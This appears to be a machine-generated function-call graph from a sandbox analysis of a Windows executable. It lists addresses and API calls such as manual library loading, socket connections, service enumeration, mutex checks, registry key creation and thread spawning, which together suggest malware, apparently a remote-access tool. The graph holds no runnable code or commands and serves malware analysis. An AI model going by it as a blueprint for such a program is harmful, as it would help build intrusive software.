412881 7 API calls 17645->17652 17649 411b59 107 API calls 17646->17649 17649->17640 17650 411d5e 17651 411d8a 108 API calls 17650->17651 17651->17640 17652->17650 17752 40f454 17757 40f45e 17752->17757 17758 402010 3 API calls 17757->17758 17759 40f459 17758->17759 17760 413e72 17759->17760 17761 413e46 2 API calls 17760->17761 17762 40f475 17761->17762 21513 1054167d 21514 10541685 21513->21514 21516 10541703 21514->21516 21517 10541726 21514->21517 21518 10541071 21517->21518 21520 105416cc 21518->21520 21523 105418ff 21518->21523 21525 10541085 21518->21525 21535 10541885 21518->21535 21519 10541726 8 API calls 21519->21520 21520->21519 21521 10541703 21520->21521 21521->21521 21526 105410ac 4 API calls 21525->21526 21527 1054109b 21526->21527 21528 10541248 VirtualAlloc 21527->21528 21534 1054141c 21527->21534 21529 10541278 21528->21529 21530 1054133e GetPEB 21529->21530 21529->21534 21533 10541354 21530->21533 21531 1054140c GetPEB 21531->21534 21532 105413bd LoadLibraryA 21532->21533 21532->21534 21533->21531 21533->21532 21534->21518 21542 10541071 21535->21542 21536 105418ff 21537 10541085 8 API calls 21537->21542 21538 10541726 8 API calls 21540 105416cc 21538->21540 21539 10541703 21540->21538 21540->21539 21541 10541885 8 API calls 21541->21542 21542->21535 21542->21536 21542->21537 21542->21540 21542->21541 15600 413e72 15603 413e46 15600->15603 15602 413e7b 15604 413e5b __dllonexit 15603->15604 15605 413e4f _onexit 15603->15605 15604->15602 15605->15602 21741 40e234 21742 40180c 4 API calls 21741->21742 21743 40e23e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 21742->21743 21748 4028cd ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 21743->21748 21745 40e24f 21746 4017dd 3 API calls 21745->21746 21747 40e6a9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21746->21747 21749 402038 2 API calls 21748->21749 21750 4028ee 21749->21750 21761 40209b connect 21750->21761 21752 402903 21753 40290c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 21752->21753 21754 40291f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 21752->21754 21755 402930 21753->21755 21754->21755 21756 4020c2 23 API calls 21755->21756 21757 402937 21756->21757 21758 402149 691 API calls 21757->21758 21759 402945 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21758->21759 21759->21745 21761->21752 21877 40dad4 21878 40180c 4 API calls 21877->21878 21879 40dadf ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 21878->21879 21880 40db32 21879->21880 21885 405812 21880->21885 21883 4017dd 3 API calls 21884 40e6a9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21883->21884 21886 402010 3 API calls 21885->21886 21887 405838 21886->21887 21917 40209b connect 21887->21917 21889 40584e ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 21890 405861 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 21889->21890 21891 405985 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 21889->21891 21893 412ddf 6 API calls 21890->21893 21892 4020c2 23 API calls 21891->21892 21895 4059a7 21892->21895 21894 405880 21893->21894 21896 40588a 21894->21896 21897 40597c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21894->21897 21919 4020f4 closesocket 21895->21919 21899 40180c 4 API calls 21896->21899 21897->21891 21901 405896 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 21899->21901 21900 4059af 21920 402103 closesocket ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21900->21920 21903 4058a7 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 21901->21903 21904 40592d ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 21901->21904 21906 402f9b 21903->21906 21907 4020c2 23 API calls 21904->21907 21905 4059b7 21905->21883 21908 4058c9 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 21906->21908 21909 405960 21907->21909 21910 40309e 4 API calls 21908->21910 21911 405963 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21909->21911 21912 4058ec ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 21910->21912 21918 4020f4 closesocket 21911->21918 21915 4020c2 23 API calls 21912->21915 21914 405971 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21914->21900 21916 40591f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21915->21916 21916->21911 21917->21889 21918->21914 21919->21900 21920->21905 15606 970000 15607 97001b RtlExitUserThread 15606->15607 21921 40e2d7 21922 40180c 4 API calls 21921->21922 21923 40e2e1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 21922->21923 21928 410e53 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 21923->21928 21925 40e2f2 21926 4017dd 3 API calls 21925->21926 21927 40e6a9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21926->21927 21929 402038 2 API calls 21928->21929 21930 410e77 21929->21930 21941 40209b connect 21930->21941 21932 410e8c 21942 4113c9 OpenSCManagerA 21932->21942 21934 410e95 21961 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 21934->21961 21936 410e9f ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 21937 4020c2 23 API calls 21936->21937 21938 410ecb ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 21937->21938 21962 402118 CreateThread 21938->21962 21940 410ef4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21940->21925 21941->21932 21943 411400 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ EnumServicesStatusW 21942->21943 21944 4113e6 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 21942->21944 21946 411442 GetLastError 21943->21946 21947 4116da CloseServiceHandle ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 21943->21947 21945 4116fd 21944->21945 21945->21934 21946->21947 21948 411453 malloc EnumServicesStatusW 21946->21948 21947->21945 21949 411485 21948->21949 21950 4116cf free 21948->21950 21951 411490 11 API calls 21949->21951 21950->21947 21963 412756 _itow ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 21951->21963 21953 411530 7 API calls 21954 4116b4 CloseServiceHandle 21953->21954 21955 41159a GetLastError 21953->21955 21954->21950 21954->21951 21955->21954 21956 4115a9 malloc QueryServiceConfigW 21955->21956 21964 412756 _itow ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 21956->21964 21958 4115d6 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 21965 412756 _itow ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 21958->21965 21960 411611 12 API calls 21960->21954 21961->21936 21962->21940 21963->21953 21964->21958 21965->21960 15609 990000 15612 413fa4 __set_app_type __p__fmode __p__commode 15609->15612 15610 99001f 15613 414013 15612->15613 15614 414027 15613->15614 15615 41401b __setusermatherr 15613->15615 15624 41411a _controlfp 15614->15624 15615->15614 15617 41402c _initterm __getmainargs _initterm 15618 414080 GetStartupInfoA 15617->15618 15620 4140b4 GetModuleHandleA 15618->15620 15625 408c98 15620->15625 15624->15617 15856 409823 15625->15856 15627 408cad ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15862 4129eb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 15627->15862 15629 408cd5 15876 40a154 15629->15876 15631 408ce5 15896 4017dd 15631->15896 15634 408d81 15901 40180c 15634->15901 15635 408d22 ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH 15636 40180c 4 API calls 15635->15636 15639 408d40 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@ ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15636->15639 15638 408d8a ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15640 40180c 4 API calls 15638->15640 15641 40981c exit _XcptFilter 15639->15641 15642 408daa ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15640->15642 15641->15610 15643 40180c 4 API calls 15642->15643 15644 408df3 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 15643->15644 15645 40180c 4 API calls 15644->15645 15646 408e0f ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 15645->15646 15647 408e72 OpenMutexA 15646->15647 15648 408e29 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15646->15648 15649 408ea2 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15647->15649 15650 408e8d WaitForSingleObject CloseHandle 15647->15650 15651 40b4c8 3 API calls 15648->15651 15905 40b4c8 RegOpenKeyExA 15649->15905 15650->15649 15653 408e48 15651->15653 15653->15647 15655 408e4f ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15653->15655 15654 408ebe 15656 408edd 15654->15656 15657 408ec5 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15654->15657 16024 40b95b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15655->16024 15660 40180c 4 API calls 15656->15660 15659 40b95b 17 API calls 15657->15659 15659->15656 15662 408ee9 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateMutexA GetLastError 15660->15662 15661 408e67 16031 40a906 CreateMutexA GetModuleFileNameW ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15661->16031 15664 408f17 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15662->15664 15665 408f1f 15662->15665 15664->15641 15908 409908 LoadLibraryA GetProcAddress 15665->15908 15669 408f24 GetModuleFileNameW 15913 412aeb 15669->15913 15673 408f58 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15674 408f78 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 15673->15674 15676 408f98 15674->15676 15677 408fe9 15676->15677 15679 40180c 4 API calls 15676->15679 15678 40180c 4 API calls 15677->15678 15680 409018 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15678->15680 15681 408fad ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15679->15681 15682 409024 15680->15682 15683 409029 15680->15683 15681->15677 15684 408fb9 15681->15684 16094 40a0e1 CreateProcessA CloseHandle CloseHandle 15682->16094 15686 40180c 4 API calls 15683->15686 15684->15677 15688 408fc9 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 15684->15688 15689 408feb ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15684->15689 15687 409032 15686->15687 15922 412881 7 API calls 15687->15922 15688->15677 15692 408fe4 15688->15692 16076 40b47f RegOpenKeyExA 15689->16076 16068 4031f8 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15692->16068 15693 40903c ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15696 40180c 4 API calls 15693->15696 15698 40905c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15696->15698 15697 40900a 16079 4030ec 15697->16079 15700 40180c 4 API calls 15698->15700 15701 409077 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15700->15701 15702 40180c 4 API calls 15701->15702 15703 409092 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15702->15703 15704 40180c 4 API calls 15703->15704 15705 4090ad ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15704->15705 15706 40914d 15705->15706 15707 4090bd 15705->15707 15708 409314 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15706->15708 15710 409201 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 15706->15710 15711 409167 15706->15711 15709 40180c 4 API calls 15707->15709 16175 40b692 RegOpenKeyExA 15708->16175 15712 4090c6 15709->15712 15715 40920e 8 API calls 15710->15715 15714 40180c 4 API calls 15711->15714 16095 412881 7 API calls 15712->16095 15719 409170 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15714->15719 15923 40b8f8 15715->15923 15717 40936a ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 15718 40937f 15717->15718 15722 40180c 4 API calls 15718->15722 15723 40180c 4 API calls 15719->15723 15721 4090d0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ wcslen ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15721->15706 15725 4090f1 15721->15725 15726 409388 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 15722->15726 15727 409187 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15723->15727 15724 40927d ??3@YAXPAX 15728 40180c 4 API calls 15724->15728 15729 40180c 4 API calls 15725->15729 15731 4093a7 15726->15731 15732 4093ab 15726->15732 15733 40180c 4 API calls 15727->15733 15734 40929c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15728->15734 15730 4090fa 15729->15730 16096 412881 7 API calls 15730->16096 16178 413d3d AllocConsole 15731->16178 15732->15731 15737 4093c2 15732->15737 15738 40919e 15733->15738 15929 40b708 RegCreateKeyA 15734->15929 15743 40180c 4 API calls 15737->15743 16097 412881 7 API calls 15738->16097 15740 4092c8 15745 40180c 4 API calls 15740->15745 15741 409104 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15746 40180c 4 API calls 15741->15746 15748 4093cb ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ 15743->15748 15744 4091a8 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15749 40180c 4 API calls 15744->15749 15750 4092d9 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 15745->15750 15751 409118 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15746->15751 15747 4093b5 CreateThread 15747->15737 15752 40180c 4 API calls 15748->15752 15753 4091bc 15749->15753 15750->15718 15754 4092ea 15750->15754 15755 4135de 37 API calls 15751->15755 15756 4093f5 15752->15756 16098 412881 7 API calls 15753->16098 15758 40180c 4 API calls 15754->15758 15759 40912c ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15755->15759 15934 412881 7 API calls 15756->15934 15762 4092f3 15758->15762 15759->15706 15761 4091c6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15766 40180c 4 API calls 15761->15766 16132 412795 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15762->16132 15763 4093ff ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15764 409474 15763->15764 15765 40941b 15763->15765 15771 40180c 4 API calls 15764->15771 15768 40180c 4 API calls 15765->15768 15769 4091da ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15766->15769 15772 409424 15768->15772 16099 407e37 wcslen 15769->16099 15770 4092ff 16135 409a2f GetModuleFileNameW ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 15770->16135 15775 40947d 15771->15775 16182 412881 7 API calls 15772->16182 15935 412881 7 API calls 15775->15935 15780 40942e ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15782 40180c 4 API calls 15780->15782 15781 409487 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15783 40180c 4 API calls 15781->15783 15784 409442 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15782->15784 15785 40949b ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15783->15785 15787 4135de 37 API calls 15784->15787 15936 4135de ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ 15785->15936 15789 409456 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15787->15789 15788 4094af ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15790 40180c 4 API calls 15788->15790 15791 409528 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15789->15791 15792 4094d9 15790->15792 15793 40180c 4 API calls 15791->15793 16183 412881 7 API calls 15792->16183 15795 409537 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 15793->15795 15797 40180c 4 API calls 15795->15797 15796 4094e3 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15796->15791 15798 409562 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15797->15798 15799 409580 15798->15799 15800 40959e ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 15798->15800 15802 409583 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 15799->15802 15803 4095b7 15799->15803 16187 405180 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 15800->16187 16184 405232 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 15802->16184 15804 40180c 4 API calls 15803->15804 15806 4095c0 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15804->15806 15808 409602 15806->15808 15809 4095cd ??2@YAPAXI 15806->15809 15807 40959c 15807->15803 15811 40180c 4 API calls 15808->15811 15810 40180c 4 API calls 15809->15810 15812 4095e3 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateThread 15810->15812 15813 40960b ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15811->15813 15812->15808 15814 409618 ??2@YAPAXI 15813->15814 15815 40964e 15813->15815 15816 40180c 4 API calls 15814->15816 15817 40180c 4 API calls 15815->15817 15818 40962f ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateThread 15816->15818 15819 409657 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15817->15819 15818->15815 15820 409664 15819->15820 15821 4096be 15819->15821 15822 40180c 4 API calls 15820->15822 15823 40180c 4 API calls 15821->15823 15824 409674 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15822->15824 15825 4096c7 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15823->15825 15826 40180c 4 API calls 15824->15826 15827 4096d4 15825->15827 15828 40970c 15825->15828 15830 409686 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15826->15830 15831 40180c 4 API calls 15827->15831 15950 412163 15828->15950 16197 41358b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15830->16197 15834 4096dd ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 15831->15834 15832 409715 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15835 409734 SetProcessDEPPolicy 15832->15835 15836 409737 CreateThread 15832->15836 15838 40180c 4 API calls 15834->15838 15835->15836 15839 409757 15836->15839 15840 40974b CreateThread 15836->15840 17141 409d3c 15836->17141 15837 40969a ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE CreateThread 15837->15821 15841 4096f7 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15838->15841 15842 40976b 15839->15842 15843 40975f CreateThread 15839->15843 15840->15839 16202 407a0a 15841->16202 15846 409774 15842->15846 15847 4097bd ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15842->15847 15843->15842 15848 409803 15846->15848 15849 40977b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15846->15849 15850 41203b 13 API calls 15847->15850 15952 40c81c 15848->15952 16211 41203b 15849->16211 15851 4097b5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15850->15851 15851->15848 16214 409d02 FindResourceA LoadResource LockResource SizeofResource 15856->16214 15858 40983c malloc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE malloc 15859 4098cb 15858->15859 16215 40309e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15859->16215 15861 4098e0 free ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15861->15627 16220 40a139 15862->16220 15864 412a0c ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15865 412a84 15864->15865 15866 412a1f ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I 15864->15866 16225 4137f5 15865->16225 15867 412a86 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15866->15867 15868 412a38 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15866->15868 15871 41383d 7 API calls 15867->15871 16221 41383d 15868->16221 15871->15865 15874 4017dd 3 API calls 15875 412ac9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 